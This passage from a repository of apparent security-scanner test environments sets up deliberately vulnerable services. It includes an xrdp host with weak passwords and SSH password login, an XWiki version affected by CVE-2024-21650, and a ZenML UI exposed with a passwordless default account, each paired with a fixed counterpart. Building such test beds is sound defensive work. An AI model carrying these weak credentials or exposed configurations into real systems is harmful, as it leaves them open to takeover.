https://linuxize.com/post/how-to-install-xrdp-on-debian-10/. 7 | 8 | ```sh 9 | sudo apt update 10 | sudo apt install xfce4 xfce4-goodies xorg dbus-x11 x11-xserver-utils 11 | sudo apt install xrdp 12 | sudo systemctl status xrdp 13 | sudo adduser xrdp ssl-cert 14 | sudo systemctl restart xrdp 15 | ``` 16 | 17 | 3. Enable password-base auth on the vm 18 | 19 | ```sh 20 | sudo vim /etc/ssh/sshd_config 21 | # Change `PasswordAuthentication yes` 22 | sudo service ssh restart 23 | ``` 24 | 25 | 4. Configure a weak password to your user 26 | ``` sh 27 | sudo passwd 28 | ``` 29 | 30 | ## Option 2 - Running xrdp in Docker 31 | 32 | Use the docker image from https://github.com/satishweb/docker-xrdp. 33 | 34 | ```sh 35 | docker run -d -e GUEST_PASS='guest' -p 3389:3389 --name xrdp satishweb/xrdp 36 | ``` 37 | -------------------------------------------------------------------------------- /xwiki/CVE-2024-21650/README.md: -------------------------------------------------------------------------------- 1 | # XWiki CVE-2024-21650 2 | 3 | This directory contains environment files and can be used with the [deployment config](https://github.com/xwiki/xwiki-docker/blob/master/15/mariadb-tomcat/docker-compose.yml) for XWiki vulnerable (15.7.0) and fixed (15.10.4) cases to test CVE-2024-21650 vulnerability. 4 | 5 | ## Vulnerable Setup 6 | 7 | ``` 8 | docker-compose --env-file env-true-positive -p xwiki-true-positive-15-7 up -d 9 | ``` 10 | 11 | ## Non-vulnerable Setup 12 | 13 | ``` 14 | docker-compose --env-file env-true-negative -p xwiki-true-negative-15-10 up -d 15 | ``` 16 | 17 | Application will be available at `localhost:8080` 18 | 19 | ## Web installation 20 | Follow the installation wizard at localhost:8080. There are a few important steps: 21 | - Register an admin user. 22 | - Install the XWiki Standard Flavor (standard configuration). 23 | 24 | The XWiki homepage will be displayed after the wizard completes. 25 | -------------------------------------------------------------------------------- /xwiki/CVE-2024-21650/env-true-negative: -------------------------------------------------------------------------------- 1 | # Default environment values 2 | XWIKI_VERSION=15.10.4 3 | DB_USER=xwiki 4 | DB_PASSWORD=xwiki 5 | DB_DATABASE=xwiki 6 | MYSQL_ROOT_PASSWORD=xwiki 7 | -------------------------------------------------------------------------------- /xwiki/CVE-2024-21650/env-true-positive: -------------------------------------------------------------------------------- 1 | # Default environment values 2 | XWIKI_VERSION=15.7.0 3 | DB_USER=xwiki 4 | DB_PASSWORD=xwiki 5 | DB_DATABASE=xwiki 6 | MYSQL_ROOT_PASSWORD=xwiki 7 | -------------------------------------------------------------------------------- /zenml/Exposed_UI/DockerfileUnSafe: -------------------------------------------------------------------------------- 1 | FROM ubuntu:22.04 2 | LABEL authors="secureness" 3 | RUN apt update \ 4 | && apt install python3.11 python3-pip python3.11-venv -y 5 | RUN mkdir zenml 6 | WORKDIR zenml 7 | 8 | RUN python3.11 -m venv .venv 9 | RUN bash -c "source .venv/bin/activate && pip install zenml[server]" 10 | 11 | ENTRYPOINT ["bash","-c","source .venv/bin/activate && zenml up --ip-address 0.0.0.0 --port 8080 && sleep 100000"] 12 | -------------------------------------------------------------------------------- /zenml/Exposed_UI/README.md: -------------------------------------------------------------------------------- 1 | 2 | # Common steps for both safe and unsafe zenml instances 3 | First, install the docker on your host machine. 4 | for running both safe and unsafe zenml instances execute `docker compose up` in this directory. 5 | 6 | # Access to the unsafe instance 7 | On the host machine, you can navigate to http://172.20.0.2:8080/ to access the platform. 8 | You can now log in by using a default credential, username is `default`, and leave the password field empty. 9 | 10 | # Access to the safe instance 11 | On the host machine, you can navigate to http://172.20.0.3:8080/ to access the platform. It will ask you to set a username and password, so no weak credentials exist in this instance. 12 | -------------------------------------------------------------------------------- /zenml/Exposed_UI/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2' 2 | 3 | networks: 4 | zenml: 5 | ipam: 6 | config: 7 | - subnet: 172.20.0.0/24 8 | 9 | services: 10 | zenml_unsafe: 11 | container_name: zenml_unsafe 12 | build: 13 | dockerfile: DockerfileUnSafe 14 | networks: 15 | zenml: 16 | ipv4_address: 172.20.0.2 17 | ports: 18 | - "8080" 19 | zenml_safe: 20 | container_name: zenml_safe 21 | image: zenmldocker/zenml-server:0.58.2 22 | networks: 23 | zenml: 24 | ipv4_address: 172.20.0.3 25 | ports: 26 | - "8080" --------------------------------------------------------------------------------